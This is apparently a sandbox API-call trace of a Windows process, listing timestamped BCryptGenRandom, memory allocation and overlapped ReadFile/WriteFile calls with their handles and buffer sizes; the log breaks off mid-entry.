0x753f0000 [0179.487] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.487] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0179.487] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.487] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.487] free (_Block=0x3e305b8) [0179.487] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.487] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.487] free (_Block=0x1fa91d0) [0179.487] free (_Block=0x1fa2ed8) [0179.487] free (_Block=0x1fa90b8) [0179.488] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0179.488] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0179.504] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.504] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.504] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0179.504] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.504] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.504] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0179.505] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.505] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.505] free (_Block=0x3e305b8) [0179.505] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.505] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.505] free (_Block=0x1fa91d0) [0179.505] free (_Block=0x1fa2ed8) [0179.505] free (_Block=0x1fa90b8) [0179.505] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0179.505] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0179.510] CloseHandle (hObject=0x3cc) returned 1 [0179.510] free (_Block=0x3d70450) [0179.510] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0179.516] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.517] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0179.517] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.517] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0179.517] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.517] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.517] free (_Block=0x3e305b8) [0179.517] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.517] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.518] free (_Block=0x1fa91d0) [0179.518] free (_Block=0x1fa2ed8) [0179.518] free (_Block=0x1fa90b8) [0179.518] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0179.518] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0179.536] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x276a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0179.545] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0179.770] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x2e4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0179.770] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0179.770] CloseHandle (hObject=0x2a8) returned 1 [0179.770] free (_Block=0x3df0008) [0179.770] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0179.771] CloseHandle (hObject=0x3cc) returned 1 [0179.771] free (_Block=0x3f70048) [0179.771] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0179.773] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2054, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0179.773] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0179.774] CloseHandle (hObject=0x2a4) returned 1 [0179.774] free (_Block=0x1ff1e60) [0179.774] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0179.824] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x167, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0179.824] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0179.824] CloseHandle (hObject=0x308) returned 1 [0179.824] free (_Block=0x3e70008) [0179.824] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0179.836] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x19a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0179.836] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0179.836] CloseHandle (hObject=0x308) returned 1 [0179.836] free (_Block=0x3df0008) [0179.836] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0179.847] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x14d, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0179.847] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0179.847] CloseHandle (hObject=0x308) returned 1 [0179.848] free (_Block=0x3df0008) [0179.848] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0179.858] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x182, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0179.859] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0179.859] CloseHandle (hObject=0x308) returned 1 [0179.859] free (_Block=0x3df0008) [0179.859] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0179.870] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x158, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0179.870] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0179.870] CloseHandle (hObject=0x308) returned 1 [0179.871] free (_Block=0x3df0008) [0179.871] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0179.889] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.890] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0179.890] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.891] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0179.891] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.891] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.891] free (_Block=0x3e305b8) [0179.891] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.891] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.892] free (_Block=0x1fa91d0) [0179.892] free (_Block=0x1fa2ed8) [0179.892] free (_Block=0x1fa90b8) [0179.892] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0179.892] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0179.893] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0179.893] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0179.901] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0179.901] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0179.918] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1ce, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0179.918] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0179.919] CloseHandle (hObject=0x2a4) returned 1 [0179.919] free (_Block=0x1ff1e60) [0179.919] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0179.928] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x155, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0179.928] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0179.928] CloseHandle (hObject=0x308) returned 1 [0179.928] free (_Block=0x3df0008) [0179.928] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0180.326] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.326] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0180.326] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.327] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0180.327] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0180.327] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0180.327] free (_Block=0x3e305b8) [0180.327] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0180.327] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0180.327] free (_Block=0x1fa91d0) [0180.327] free (_Block=0x1fa2ed8) [0180.327] free (_Block=0x1fa90b8) [0180.327] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0180.328] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0180.328] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0180.328] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0180.336] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x255, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0180.336] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0180.337] CloseHandle (hObject=0x308) returned 1 [0180.337] free (_Block=0x3df0008) [0180.337] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0180.342] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xff7, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0180.342] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0180.343] CloseHandle (hObject=0x2a4) returned 1 [0180.343] free (_Block=0x1ff1e60) [0180.343] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0180.353] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2a7, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0180.353] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0180.354] CloseHandle (hObject=0x2a4) returned 1 [0180.354] free (_Block=0x3df0008) [0180.354] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0180.363] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2ad, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0180.363] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0180.363] CloseHandle (hObject=0x2a4) returned 1 [0180.363] free (_Block=0x3df0008) [0180.363] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0180.371] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x161, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0180.371] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0180.372] CloseHandle (hObject=0x2a4) returned 1 [0180.372] free (_Block=0x3df0008) [0180.372] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0180.381] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1ef, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0180.381] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0180.381] CloseHandle (hObject=0x2a4) returned 1 [0180.381] free (_Block=0x3df0008) [0180.381] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0180.414] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.414] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0180.414] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.414] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0180.415] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0180.415] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0180.415] free (_Block=0x3e305b8) [0180.415] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0180.415] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0180.415] free (_Block=0x1fa91d0) [0180.415] free (_Block=0x77d7a8) [0180.415] free (_Block=0x1fa90b8) [0180.415] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0180.415] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0180.433] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2bc, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0180.433] GetQueuedCompletionStatus (in: 